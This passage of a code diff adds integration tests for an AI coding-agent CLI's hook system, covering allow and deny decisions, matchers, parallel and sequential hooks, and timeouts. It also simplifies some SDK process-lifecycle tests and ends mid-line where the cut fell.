+ timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run( + 'Say multiple different notification test', + ); + + expect(result).toBeDefined(); + }); + }); + + describe('Notification Hook Error Handling', () => { + it('should handle missing command gracefully', async () => { + await rig.setup('notification-missing-command', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + Notification: [ + { + hooks: [ + { + type: 'command', + command: '', // Empty command + name: 'notification-empty-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // Empty command should be skipped gracefully + const result = await rig.run('Say missing command test'); + + expect(result).toBeDefined(); + }); + + it('should handle non-executable command gracefully', async () => { + await rig.setup('notification-non-executable', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + Notification: [ + { + hooks: [ + { + type: 'command', + command: '/nonexistent/path/to/command', + name: 'notification-non-exec-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // Non-existent command should be handled gracefully + const result = await rig.run('Say non-executable command test'); + + expect(result).toBeDefined(); + }); + + it('should handle command with non-zero exit code gracefully', async () => { + await rig.setup('notification-nonzero-exit', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + Notification: [ + { + hooks: [ + { + type: 'command', + command: 'echo "warning" >&2 && exit 1', + name: 'notification-nonzero-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // Non-zero exit should be handled gracefully for notification hooks + const result = await rig.run('Say nonzero exit code test'); + + expect(result).toBeDefined(); + }); + + it('should handle command timeout gracefully', async () => { + await rig.setup('notification-timeout', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + Notification: [ + { + hooks: [ + { + type: 'command', + command: 'sleep 10', + name: 'notification-timeout-hook', + timeout: 1000, // Very short timeout to trigger timeout condition + }, + ], + }, + ], + }, + }, + }); + + // Timeout should be handled gracefully + const result = await rig.run('Say timeout test'); + + expect(result).toBeDefined(); + }); + }); + }); + + // ========================================================================== + // PreToolUse Hooks + // Triggered before a tool is executed + // ========================================================================== + describe('PreToolUse Hooks', () => { + describe('Allow Decision', () => { + it('should allow tool execution when hook returns allow decision', async () => { + const hookScript = + 'echo \'{"hookSpecificOutput": {"hookEventName": "PreToolUse", "permissionDecision": "allow", "permissionDecisionReason": "Tool execution approved by pretooluse hook"}}\''; + + await rig.setup('pretooluse-allow-decision', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PreToolUse: [ + { + hooks: [ + { + type: 'command', + command: hookScript, + name: 'pretooluse-allow-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say hello world'); + + // Verify that the interaction completed successfully (the hook allowed execution) + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + + it('should allow tool execution with additional context from hook', async () => { + const hookScript = + 'echo \'{"hookSpecificOutput": {"hookEventName": "PreToolUse", "permissionDecision": "allow", "permissionDecisionReason": "Security check passed by pretooluse hook", "additionalContext": "Security check passed by pretooluse hook"}}\''; + + await rig.setup('pretooluse-allow-with-context', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PreToolUse: [ + { + hooks: [ + { + type: 'command', + command: hookScript, + name: 'pretooluse-context-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say context test'); + + // Verify that the interaction completed successfully (the hook allowed execution) + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + }); + + describe('Block Decision', () => { + it('should block tool execution when hook returns block decision', async () => { + const blockScript = + 'echo \'{"hookSpecificOutput": {"hookEventName": "PreToolUse", "permissionDecision": "deny", "permissionDecisionReason": "Tool execution blocked by security policy in pretooluse"}}\''; + + await rig.setup('pretooluse-block-decision', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PreToolUse: [ + { + hooks: [ + { + type: 'command', + command: blockScript, + name: 'pretooluse-block-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // When PreToolUse hook blocks, the interaction should still return a response + const result = await rig.run('Say should be blocked'); + + // Verify that a response was received despite the block + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + + it('should block specific tools based on tool name matching', async () => { + const blockSpecificToolScript = ` + INPUT=$(cat) + TOOL_NAME=$(echo "$INPUT" | jq -r '.tool_name') + + if [ "$TOOL_NAME" = "write_file" ]; then + echo '{"hookSpecificOutput": {"hookEventName": "PreToolUse", "permissionDecision": "deny", "permissionDecisionReason": "File writing blocked by pretooluse hook"}}' + else + echo '{"hookSpecificOutput": {"hookEventName": "PreToolUse", "permissionDecision": "allow", "permissionDecisionReason": "Tool allowed by pretooluse hook"}}' + fi + `; + + await rig.setup('pretooluse-block-specific-tool', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PreToolUse: [ + { + hooks: [ + { + type: 'command', + command: blockSpecificToolScript, + name: 'pretooluse-block-specific-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // Attempt to say something - should be blocked by the hook for write_file operations + const result = await rig.run('Say should be blocked'); + + // Verify that a response was received + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + + // But other prompts should still work + const readResult = await rig.run('Say hello from other tools'); + expect(readResult).toBeDefined(); + expect(readResult.length).toBeGreaterThan(0); + }); + }); + + describe('Matcher Scenarios', () => { + it('should match specific tools with regex matcher', async () => { + const specificToolScript = + 'echo \'{"hookSpecificOutput": {"hookEventName": "PreToolUse", "permissionDecision": "allow", "permissionDecisionReason": "Specific tool matched and allowed by pretooluse", "additionalContext": "Specific tool matched and allowed by pretooluse"}}\''; + + await rig.setup('pretooluse-matcher-specific', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PreToolUse: [ + { + matcher: 'write_file|read_file', + hooks: [ + { + type: 'command', + command: specificToolScript, + name: 'pretooluse-specific-tool-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say matcher test'); + + // Verify that the interaction completed successfully (the hook allowed execution) + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + + it('should match all tools with wildcard matcher', async () => { + const wildcardScript = + 'echo \'{"hookSpecificOutput": {"hookEventName": "PreToolUse", "permissionDecision": "allow", "permissionDecisionReason": "Wildcard matcher allowed all tools in pretooluse", "additionalContext": "Wildcard matcher allowed all tools in pretooluse"}}\''; + + await rig.setup('pretooluse-matcher-wildcard', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PreToolUse: [ + { + matcher: '*', + hooks: [ + { + type: 'command', + command: wildcardScript, + name: 'pretooluse-wildcard-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say wildcard test'); + + // Verify that the interaction completed successfully (the hook allowed execution) + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + + it('should not execute when matcher does not match', async () => { + const noMatchScript = + 'echo \'{"hookSpecificOutput": {"hookEventName": "PreToolUse", "permissionDecision": "allow", "permissionDecisionReason": "Should not execute in pretooluse", "additionalContext": "Should not execute in pretooluse"}}\''; + + await rig.setup('pretooluse-matcher-no-match', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PreToolUse: [ + { + matcher: 'nonexistent_tool', // This won't match any real tool + hooks: [ + { + type: 'command', + command: noMatchScript, + name: 'pretooluse-no-match-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say no match test'); + + // Verify that the interaction completed successfully (the hook allowed execution) + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + }); + + describe('Error Handling', () => { + it('should continue execution when hook exits with non-blocking error', async () => { + await rig.setup('pretooluse-nonblocking-error', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PreToolUse: [ + { + hooks: [ + { + type: 'command', + command: 'echo warning && exit 1', + name: 'pretooluse-error-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say error test'); + + // Verify that the interaction completed successfully despite the hook error + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + + it('should continue execution when hook command does not exist', async () => { + await rig.setup('pretooluse-missing-command', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PreToolUse: [ + { + hooks: [ + { + type: 'command', + command: '/nonexistent/pretooluse/command', + name: 'pretooluse-missing-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say missing test'); + + // Verify that the interaction completed successfully despite the missing hook command + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + }); + + describe('Multiple PreToolUse Hooks', () => { + it('should execute multiple parallel PreToolUse hooks', async () => { + const script1 = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Parallel pretooluse hook 1"}}\''; + const script2 = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Parallel pretooluse hook 2"}}\''; + + await rig.setup('pretooluse-multi-parallel', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PreToolUse: [ + { + hooks: [ + { + type: 'command', + command: script1, + name: 'pretooluse-parallel-1', + timeout: 5000, + }, + { + type: 'command', + command: script2, + name: 'pretooluse-parallel-2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say parallel test'); + + // Verify that the interaction completed successfully with multiple parallel hooks + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + + it('should execute sequential PreToolUse hooks in order', async () => { + const script1 = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Sequential pretooluse hook 1"}}\''; + const script2 = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Sequential pretooluse hook 2"}}\''; + + await rig.setup('pretooluse-multi-sequential', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PreToolUse: [ + { + sequential: true, + hooks: [ + { + type: 'command', + command: script1, + name: 'pretooluse-seq-1', + timeout: 5000, + }, + { + type: 'command', + command: script2, + name: 'pretooluse-seq-2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say sequential test'); + + // Verify that the interaction completed successfully with multiple sequential hooks + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + + it('should block when one of multiple parallel hooks returns block', async () => { + const allowScript = 'echo \'{"decision": "allow"}\''; + const blockScript = + 'echo \'{"decision": "block", "reason": "Blocked by security policy in parallel pretooluse"}\''; + + await rig.setup('pretooluse-multi-one-blocks', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PreToolUse: [ + { + hooks: [ + { + type: 'command', + command: allowScript, + name: 'pretooluse-allow-hook', + timeout: 5000, + }, + { + type: 'command', + command: blockScript, + name: 'pretooluse-block-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // When one hook blocks, the tool should not execute + const result = await rig.run('Say should be blocked'); + + // Verify that a response was received despite the block + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + + it('should block when first sequential hook returns block', async () => { + const blockScript = + 'echo \'{"decision": "block", "reason": "First hook blocks in sequential pretooluse"}\''; + const allowScript = 'echo \'{"decision": "allow"}\''; + + await rig.setup('pretooluse-seq-first-blocks', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PreToolUse: [ + { + sequential: true, + hooks: [ + { + type: 'command', + command: blockScript, + name: 'pretooluse-seq-block-hook', + timeout: 5000, + }, + { + type: 'command', + command: allowScript, + name: 'pretooluse-seq-allow-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // When the first hook blocks, the tool should not execute + const result = await rig.run('Say should be blocked'); + + // Verify that a response was received despite the block + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + + it('should concatenate additional context from multiple hooks', async () => { + const context1 = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Context from pretooluse hook 1"}}\''; + const context2 = + 'echo \'{"decision": "allow", "hookSpecificOutput": {"additionalContext": "Context from pretooluse hook 2"}}\''; + + await rig.setup('pretooluse-multi-context', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PreToolUse: [ + { + hooks: [ + { + type: 'command', + command: context1, + name: 'pretooluse-ctx-1', + timeout: 5000, + }, + { + type: 'command', + command: context2, + name: 'pretooluse-ctx-2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say multi context test'); + + // Verify that the interaction completed successfully with multiple context hooks + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + }); + }); + + // ========================================================================== + // PostToolUse Hooks + // Triggered after a tool executes successfully + // ========================================================================== + describe('PostToolUse Hooks', () => { + describe('Basic Functionality', () => { + it('should execute PostToolUse hook after successful tool execution', async () => { + const hookScript = + 'echo \'{"decision": "allow", "reason": "Tool execution logged by posttooluse hook", "hookSpecificOutput": {"hookEventName": "PostToolUse", "additionalContext": "Tool execution logged by posttooluse hook"}}\''; + + await rig.setup('posttooluse-basic', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PostToolUse: [ + { + hooks: [ + { + type: 'command', + command: hookScript, + name: 'posttooluse-basic-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say posttooluse test'); + + // Verify that the interaction completed successfully with the posttooluse hook + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + }); + + describe('Matcher Scenarios', () => { + it('should match specific tools with regex matcher', async () => { + const specificToolScript = + 'echo \'{"decision": "allow", "reason": "Specific tool matched by posttooluse", "hookSpecificOutput": {"hookEventName": "PostToolUse", "additionalContext": "Specific tool matched by posttooluse"}}\''; + + await rig.setup('posttooluse-matcher-specific', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PostToolUse: [ + { + matcher: 'write_file|read_file', + hooks: [ + { + type: 'command', + command: specificToolScript, + name: 'posttooluse-specific-tool-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say matcher test'); + + // Verify that the interaction completed successfully with the posttooluse hook + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + + it('should match all tools with wildcard matcher', async () => { + const wildcardScript = + 'echo \'{"decision": "allow", "reason": "Wildcard matcher processed all tools in posttooluse", "hookSpecificOutput": {"hookEventName": "PostToolUse", "additionalContext": "Wildcard matcher processed all tools in posttooluse"}}\''; + + await rig.setup('posttooluse-matcher-wildcard', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PostToolUse: [ + { + matcher: '*', + hooks: [ + { + type: 'command', + command: wildcardScript, + name: 'posttooluse-wildcard-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say wildcard test'); + + // Verify that the interaction completed successfully with the posttooluse hook + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + + it('should not execute when matcher does not match', async () => { + const noMatchScript = + 'echo \'{"decision": "allow", "reason": "Should not execute in posttooluse", "hookSpecificOutput": {"hookEventName": "PostToolUse", "additionalContext": "Should not execute in posttooluse"}}\''; + + await rig.setup('posttooluse-matcher-no-match', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PostToolUse: [ + { + matcher: 'nonexistent_tool', // This won't match any real tool + hooks: [ + { + type: 'command', + command: noMatchScript, + name: 'posttooluse-no-match-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say no match test'); + + // Verify that the interaction completed successfully (the hook didn't block execution since it didn't match) + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + }); + + describe('Multiple PostToolUse Hooks', () => { + it('should execute multiple parallel PostToolUse hooks', async () => { + const script1 = + 'echo \'{"decision": "allow", "reason": "Parallel posttooluse hook 1", "hookSpecificOutput": {"hookEventName": "PostToolUse", "additionalContext": "Parallel posttooluse hook 1"}}\''; + const script2 = + 'echo \'{"decision": "allow", "reason": "Parallel posttooluse hook 2", "hookSpecificOutput": {"hookEventName": "PostToolUse", "additionalContext": "Parallel posttooluse hook 2"}}\''; + + await rig.setup('posttooluse-multi-parallel', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PostToolUse: [ + { + hooks: [ + { + type: 'command', + command: script1, + name: 'posttooluse-parallel-1', + timeout: 5000, + }, + { + type: 'command', + command: script2, + name: 'posttooluse-parallel-2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say parallel test'); + + // Verify that the interaction completed successfully with multiple posttooluse hooks + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + + it('should execute sequential PostToolUse hooks in order', async () => { + const script1 = + 'echo \'{"decision": "allow", "reason": "Sequential posttooluse hook 1", "hookSpecificOutput": {"hookEventName": "PostToolUse", "additionalContext": "Sequential posttooluse hook 1"}}\''; + const script2 = + 'echo \'{"decision": "allow", "reason": "Sequential posttooluse hook 2", "hookSpecificOutput": {"hookEventName": "PostToolUse", "additionalContext": "Sequential posttooluse hook 2"}}\''; + + await rig.setup('posttooluse-multi-sequential', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PostToolUse: [ + { + sequential: true, + hooks: [ + { + type: 'command', + command: script1, + name: 'posttooluse-seq-1', + timeout: 5000, + }, + { + type: 'command', + command: script2, + name: 'posttooluse-seq-2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say sequential test'); + + // Verify that the interaction completed successfully with multiple sequential posttooluse hooks + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + + it('should concatenate additional context from multiple hooks', async () => { + const context1 = + 'echo \'{"decision": "allow", "reason": "Context from posttooluse hook 1", "hookSpecificOutput": {"hookEventName": "PostToolUse", "additionalContext": "Context from posttooluse hook 1"}}\''; + const context2 = + 'echo \'{"decision": "allow", "reason": "Context from posttooluse hook 2", "hookSpecificOutput": {"hookEventName": "PostToolUse", "additionalContext": "Context from posttooluse hook 2"}}\''; + + await rig.setup('posttooluse-multi-context', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PostToolUse: [ + { + hooks: [ + { + type: 'command', + command: context1, + name: 'posttooluse-ctx-1', + timeout: 5000, + }, + { + type: 'command', + command: context2, + name: 'posttooluse-ctx-2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say multi context test'); + + // Verify that the interaction completed successfully with multiple context posttooluse hooks + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + }); + }); + + // ========================================================================== + // PostToolUseFailure Hooks + // Triggered after a tool fails to execute + // ========================================================================== + describe('PostToolUseFailure Hooks', () => { + describe('Basic Functionality', () => { + it('should execute PostToolUseFailure hook after failed tool execution', async () => { + const hookScript = + 'echo \'{"hookSpecificOutput": {"additionalContext": "Tool failure logged by posttoolusefailure hook"}}\''; + + await rig.setup('posttoolusefailure-basic', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PostToolUseFailure: [ + { + hooks: [ + { + type: 'command', + command: hookScript, + name: 'posttoolusefailure-basic-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // Attempt to read a non-existent file to trigger a tool failure + const result = await rig.run('Read the nonexistent-file.txt file'); + + // The tool should fail, but the hook should still execute + expect(result).toBeDefined(); + }); + + it('should receive tool failure details in hook input', async () => { + const hookScript = ` + INPUT=$(cat) + TOOL_NAME=$(echo "$INPUT" | jq -r '.tool_name') + ERROR_MESSAGE=$(echo "$INPUT" | jq -r '.error_message // empty') + + echo '{"hookSpecificOutput": {"additionalContext": "Failed ' + '$TOOL_NAME' + ' with error: ' + '$ERROR_MESSAGE' + '"}}' + `; + + await rig.setup('posttoolusefailure-with-details', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PostToolUseFailure: [ + { + hooks: [ + { + type: 'command', + command: hookScript, + name: 'posttoolusefailure-details-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + // Attempt to read a non-existent file to trigger a tool failure + const result = await rig.run('Read the nonexistent-details.txt file'); + + // The tool should fail, but the hook should still execute and process the error details + expect(result).toBeDefined(); + }); + }); + }); + + // ========================================================================== + // PreCompact Hooks + // Triggered before conversation compaction + // ========================================================================== + describe('PreCompact Hooks', () => { + describe('Basic Functionality', () => { + it('should execute PreCompact hook before conversation compaction', async () => { + const hookScript = + 'echo \'{"hookSpecificOutput": {"hookEventName": "PreCompact", "additionalContext": "Compaction approved by precompact hook"}}\''; + + await rig.setup('precompact-basic', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PreCompact: [ + { + hooks: [ + { + type: 'command', + command: hookScript, + name: 'precompact-basic-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say precompact test'); + + // Verify that the interaction completed successfully with the precompact hook + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + + it('should receive compaction details in hook input', async () => { + const hookScript = ` + INPUT=$(cat) + TRIGGER=$(echo "$INPUT" | jq -r '.trigger') + CUSTOM_INSTRUCTIONS=$(echo "$INPUT" | jq -r '.custom_instructions // empty') + + echo '{"hookSpecificOutput": {"hookEventName": "PreCompact", "additionalContext": "Compaction triggered by: ' + '$TRIGGER' + ', Instructions length: $(echo "$CUSTOM_INSTRUCTIONS" | wc -c)"}}' + `; + + await rig.setup('precompact-with-details', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PreCompact: [ + { + hooks: [ + { + type: 'command', + command: hookScript, + name: 'precompact-details-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say precompact details test'); + + // Verify that the interaction completed successfully with the precompact hook + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + }); + + describe('Context Scenarios', () => { + it('should provide additional context when hook returns context', async () => { + const contextScript = + 'echo \'{"hookSpecificOutput": {"hookEventName": "PreCompact", "additionalContext": "Compaction context provided by precompact hook"}}\''; + + await rig.setup('precompact-context', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PreCompact: [ + { + hooks: [ + { + type: 'command', + command: contextScript, + name: 'precompact-context-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say precompact context test'); + + // Verify that the interaction completed successfully with context + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + }); + + describe('Matcher Scenarios', () => { + it('should match all compaction triggers with wildcard matcher', async () => { + const wildcardScript = + 'echo \'{"hookSpecificOutput": {"hookEventName": "PreCompact", "additionalContext": "Wildcard matcher allowed compaction in precompact"}}\''; + + await rig.setup('precompact-matcher-wildcard', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PreCompact: [ + { + matcher: '*', + hooks: [ + { + type: 'command', + command: wildcardScript, + name: 'precompact-wildcard-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say precompact wildcard test'); + + // Verify that the interaction completed successfully with the wildcard matcher + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + + it('should not execute when matcher does not match', async () => { + const noMatchScript = + 'echo \'{"hookSpecificOutput": {"hookEventName": "PreCompact", "additionalContext": "Should not execute in precompact"}}\''; + + await rig.setup('precompact-matcher-no-match', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PreCompact: [ + { + matcher: 'nonexistent_trigger', // This won't match any real trigger + hooks: [ + { + type: 'command', + command: noMatchScript, + name: 'precompact-no-match-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say precompact no match test'); + + // Verify that the interaction completed successfully (the hook didn't block execution since it didn't match) + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + }); + + describe('Multiple PreCompact Hooks', () => { + it('should execute multiple parallel PreCompact hooks', async () => { + const script1 = + 'echo \'{"hookSpecificOutput": {"hookEventName": "PreCompact", "additionalContext": "Parallel precompact hook 1"}}\''; + const script2 = + 'echo \'{"hookSpecificOutput": {"hookEventName": "PreCompact", "additionalContext": "Parallel precompact hook 2"}}\''; + + await rig.setup('precompact-multi-parallel', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PreCompact: [ + { + hooks: [ + { + type: 'command', + command: script1, + name: 'precompact-parallel-1', + timeout: 5000, + }, + { + type: 'command', + command: script2, + name: 'precompact-parallel-2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say precompact parallel test'); + + // Verify that the interaction completed successfully with multiple parallel hooks + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + + it('should execute sequential PreCompact hooks in order', async () => { + const script1 = + 'echo \'{"hookSpecificOutput": {"hookEventName": "PreCompact", "additionalContext": "Sequential precompact hook 1"}}\''; + const script2 = + 'echo \'{"hookSpecificOutput": {"hookEventName": "PreCompact", "additionalContext": "Sequential precompact hook 2"}}\''; + + await rig.setup('precompact-multi-sequential', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PreCompact: [ + { + sequential: true, + hooks: [ + { + type: 'command', + command: script1, + name: 'precompact-seq-1', + timeout: 5000, + }, + { + type: 'command', + command: script2, + name: 'precompact-seq-2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say precompact sequential test'); + + // Verify that the interaction completed successfully with multiple sequential hooks + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + + it('should concatenate additional context from multiple hooks', async () => { + const context1 = + 'echo \'{"hookSpecificOutput": {"hookEventName": "PreCompact", "additionalContext": "Context from precompact hook 1"}}\''; + const context2 = + 'echo \'{"hookSpecificOutput": {"hookEventName": "PreCompact", "additionalContext": "Context from precompact hook 2"}}\''; + + await rig.setup('precompact-multi-context', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PreCompact: [ + { + hooks: [ + { + type: 'command', + command: context1, + name: 'precompact-ctx-1', + timeout: 5000, + }, + { + type: 'command', + command: context2, + name: 'precompact-ctx-2', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say precompact multi context test'); + + // Verify that the interaction completed successfully with multiple context hooks + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + }); + + describe('Error Handling', () => { + it('should continue execution when hook exits with error', async () => { + await rig.setup('precompact-error', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PreCompact: [ + { + hooks: [ + { + type: 'command', + command: 'echo warning && exit 1', + name: 'precompact-error-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say precompact error test'); + + // Verify that the interaction completed successfully despite the hook error + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + + it('should continue execution when hook command does not exist', async () => { + await rig.setup('precompact-missing-command', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PreCompact: [ + { + hooks: [ + { + type: 'command', + command: '/nonexistent/precompact/command', + name: 'precompact-missing-hook', + timeout: 5000, + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say precompact missing test'); + + // Verify that the interaction completed successfully despite the missing hook command + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + + it('should handle hook timeout gracefully', async () => { + await rig.setup('precompact-timeout', { + settings: { + hooksConfig: { enabled: true }, + hooks: { + PreCompact: [ + { + hooks: [ + { + type: 'command', + command: 'sleep 60', + name: 'precompact-timeout-hook', + timeout: 1000, // 1 second timeout + }, + ], + }, + ], + }, + }, + }); + + const result = await rig.run('Say precompact timeout test'); + + // Verify that the interaction completed successfully despite the hook timeout + expect(result).toBeDefined(); + expect(result.length).toBeGreaterThan(0); + }); + }); + }); }); diff --git a/integration-tests/sdk-typescript/abort-and-lifecycle.test.ts b/integration-tests/sdk-typescript/abort-and-lifecycle.test.ts index d4566fcf3..f9bd77963 100644 --- a/integration-tests/sdk-typescript/abort-and-lifecycle.test.ts +++ b/integration-tests/sdk-typescript/abort-and-lifecycle.test.ts @@ -13,7 +13,6 @@ import { isSDKAssistantMessage, isSDKResultMessage, type TextBlock, - type ContentBlock, type SDKUserMessage, } from '@qwen-code/sdk'; import { @@ -149,7 +148,7 @@ describe('AbortController and Process Lifecycle (E2E)', () => { describe('Process Lifecycle Monitoring', () => { it('should handle normal process completion', async () => { const q = query({ - prompt: 'Why do we choose to go to the moon?', + prompt: 'Say hello', options: { ...SHARED_TEST_OPTIONS, cwd: testDir, @@ -158,18 +157,12 @@ describe('AbortController and Process Lifecycle (E2E)', () => { }); let completedSuccessfully = false; + let receivedAssistantMessage = false; try { for await (const message of q) { if (isSDKAssistantMessage(message)) { - const textBlocks = message.message.content.filter( - (block): block is TextBlock => block.type === 'text', - ); - const text = textBlocks - .map((b) => b.text) - .join('') - .slice(0, 100); - expect(text.length).toBeGreaterThan(0); + receivedAssistantMessage = true; } } @@ -180,6 +173,7 @@ describe('AbortController and Process Lifecycle (E2E)', () => { } finally { await q.close(); expect(completedSuccessfully).toBe(true); + expect(receivedAssistantMessage).toBe(true); } }); @@ -219,7 +213,7 @@ describe('AbortController and Process Lifecycle (E2E)', () => { describe('Input Stream Control', () => { it('should support endInput() method', async () => { const q = query({ - prompt: 'What is 2 + 2?', + prompt: 'Say hello', options: { ...SHARED_TEST_OPTIONS, cwd: testDir, @@ -233,13 +227,6 @@ describe('AbortController and Process Lifecycle (E2E)', () => { try { for await (const message of q) { if (isSDKAssistantMessage(message) && !endInputCalled) { - const textBlocks = message.message.content.filter( - (block: ContentBlock): block is TextBlock => - block.type === 'text', - ); - const text = textBlocks.map((b: TextBlock) => b.text).join(''); - - expect(text.length).toBeGreaterThan(0); receivedResponse = true; // End input after receiving first response @@ -485,7 +472,7 @@ describe('AbortController and Process Lifecycle (E2E)', () => { const stderrMessages: string[] = []; const q = query({ - prompt: 'Why do we choose to go to the moon?', + prompt: 'Say hello', options: { ...SHARED_TEST_OPTIONS, cwd: testDir, @@ -497,17 +484,8 @@ describe('AbortController and Process Lifecycle (E2E)', () => { }); try { - for await (const message of q) { - if (isSDKAssistantMessage(message)) { - const 